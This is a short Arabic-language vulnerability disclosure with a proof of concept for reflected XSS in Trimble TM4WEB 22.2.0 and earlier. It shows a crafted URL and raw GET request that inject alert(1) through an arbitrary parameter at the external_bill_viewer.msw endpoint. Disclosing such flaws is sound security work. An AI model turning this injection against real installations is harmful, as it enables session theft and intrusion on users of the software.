
استغلال إثبات المفهوم لثغرة البرمجة النصية عبر المواقع المنعكسة (XSS) في Trimble TM4WEB <=22.2.0، مما يوضح الحقن عبر معلمات URL عشوائية في نقطة نهاية عارض الفاتورة الخارجية.
في Trimble TM4WEB <=22.2.0، نقطة النهاية لعرض الفاتورة الخارجية معرضة لثغرة XSS المنعكسة عن طريق الحقن في معلمة عشوائية مضافة إلى عنوان URL.
الخطوة 1:
سوف يؤدي عنوان URL المثال التالي إلى تشغيل الثغرة وتنفيذ دالة JavaScript alert() لعرض الرقم 1 كإثبات للمفهوم. تعمل هذه الثغرة على كل تثبيت TM4WEB تم ملاحظته حتى الآن من قبل الباحث. مثال لعنوان URL ضار يستخدم موقعًا غير موجود:
https://example-tm4web.com/trace/external_bill_viewer.msw?foo=bar"}%27);alert(1);<!--
يؤدي عنوان URL هذا إلى تشغيل طلب GET الخبيث التالي.
GET /trace/external_bill_viewer.msw?foo=bar%22}%27);alert(1);%3C!-- HTTP/1.1
Host: example-tm4web.com
Connection: close
يستغل هذا الطلب معلمة عشوائية لنقطة النهاية الضعيفة external_bill_viewer.msw.
يؤدي الهجوم إلى حقن كود JavaScript صالح في السطر 84 من استجابة HTTP، كما هو موضح في لقطة الشاشة أدناه:

مثال الحقن موضح أدناه مع تنفيذ JavaScript الناتج للحمولة alert(1):